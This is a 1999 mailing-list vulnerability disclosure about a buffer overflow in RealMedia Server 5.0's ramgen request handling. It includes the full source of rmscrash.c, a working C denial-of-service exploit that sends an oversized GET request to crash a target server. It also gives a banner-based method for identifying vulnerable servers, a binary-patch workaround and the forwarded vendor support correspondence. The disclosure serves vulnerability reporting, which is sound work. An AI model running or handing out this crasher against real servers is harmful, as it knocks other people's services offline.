Date: Wed, 22 Dec 1999 22:33:21 -0800
From: bow <[email protected]>
To: [email protected]Subject: RealMedia Server 5.0 Crasher (rmscrash.c)
RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing
the buffer which stores the ramgen requests.
I emailed RealNetworks about it and they finally got back to me a month and
a half later. Their response was that it's a known issue with 5.0 and the
only way to fix it is to upgrade to 6.0.. Of course upgrading means paying
more money.
I really wish all companies would fully back their COMMERCIAL software and
make patches for previous releases. Oh well.
The exploit is included below. It's been tested on FreeBSD and RealMedia
server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the
person who crashed it in the pnserver error log. It looks like this:
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report
An easy way to tell if a server is running 5.0 is to telnet to the realmedia port,
usually 7070, and typing:
GET /SmpDsBhgRl <enter><enter>
>From what i've seen, RealMedia 5.0 servers always returns "Server: RealServer 1.0 Beta" in the
headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".
A hacked up fix for the problem that I've used is to edit the pnserver binary and change the ramgen
string to something else. This, however, will break the ramgen functionality. (Which i dont use).
If you are going to rename the ramgen in the binary to something else, make sure it matches the string
length of 6.
-bow
-- START OF RMSCRASH.C --
/*
* rmscrash.c - [email protected]
*
* Crash a RealMedia 5.0 server by sending a very long ramgen request.
*
* Test on:
* $ pnserver -v
* Version: 5.0-rvserver-build-290
* Platform: FreeBSD-2.1.x
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define BUFLEN 4082
char buf[BUFLEN+14];
int sock;
struct sockaddr_in sa;
struct hostent *hp;
void main (int argc, char *argv[]) {
int i, port;
if (argc < 3) {
printf("Usage: %s realserver port\n",argv[0]);
exit(-1);
}
port = atoi(argv[2]);
memset(buf,0x41,BUFLEN);
memcpy(buf,"GET /ramgen/",12);
memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);
if ((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(port);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("Connected to %s. Sending data\n",argv[1]);
write(sock,buf,strlen(buf));
printf("Done.\n");
close(sock);
exit(0);
}
--- END OF RMSCRASH.C ---
----- Forwarded message from [email protected] -----
From: [email protected]
Date: Wed, 22 Dec 1999 10:14:57 -0800
Subject: Re: max the ramgen buffer [#7570768]
To: [email protected]
X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016
Hello Bow,
No, unfortunately there is not. The solution is to upgrade to 6.0 or 7.0.
Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer
------- Original Message --------
>From: [email protected]
>To: [email protected]
>Subject: Re: max the ramgen buffer [#7570768]
>Date: 12/21/99 16:58:20
>
>
>Well is there a fix for this in the 5.0 server??
>
>-bow
>
>On Tue, Dec 21, 1999 at 04:52:07PM -0800, [email protected] wrote:
>> Hello Bow,
>>
>> First of all, I apolgize for the delay in responding. Thank you so much for your patience.
>>
>> This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.
>>
>> Best wishes,
>> Kim
>> ~~~~~~~~~~~~~~~~~~~~
>> Kimberly Ayars
>> SDK Support Engineer
>> ------- Original Message --------
>> >From: [email protected]
>> >To: [email protected]
>> >Subject: max the ramgen buffer
>> >Date: 11/06/99 04:10:46
>> >
>> >
>> > Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue?
>> >
>> >***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
>> >***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report:
>> >5.0-rvserver-build-290
>> >FreeBSD-2.1.x
>> >
>> >
>> >Do you guys have an updated Real5 server?
>> >
>> >
>> THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSS
IBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
>>
>>
>> Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc.
>>
>>
>> ---------------------
>> Instructions to Reply
>> ---------------------
>>
>>
>> Your Incident ID number for this request is 7570768
>>
>> To reply to this message you may simply reply to this email. (Please do not modify the subject line)
>>
>> To view all activity on this ticket go to the following URL. You will also be able to reply from there.
>>
>>
>> http://customerrelations.real.com/scripts/rnforms/loginpage.asp
>>
>>
>> To verify your identity, you will be prompted for this Incident ID number and your email address.
>>
>>
>
>
THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBI
LITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.
Copyright c RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc.
---------------------
Instructions to Reply
---------------------
Your Incident ID number for this request is 7570768
To reply to this message you may simply reply to this email. (Please do not modify the subject line)
To view all activity on this ticket go to the following URL. You will also be able to reply from there.
http://customerrelations.real.com/scripts/rnforms/loginpage.asp
To verify your identity, you will be prompted for this Incident ID number and your email address.
----- End forwarded message -----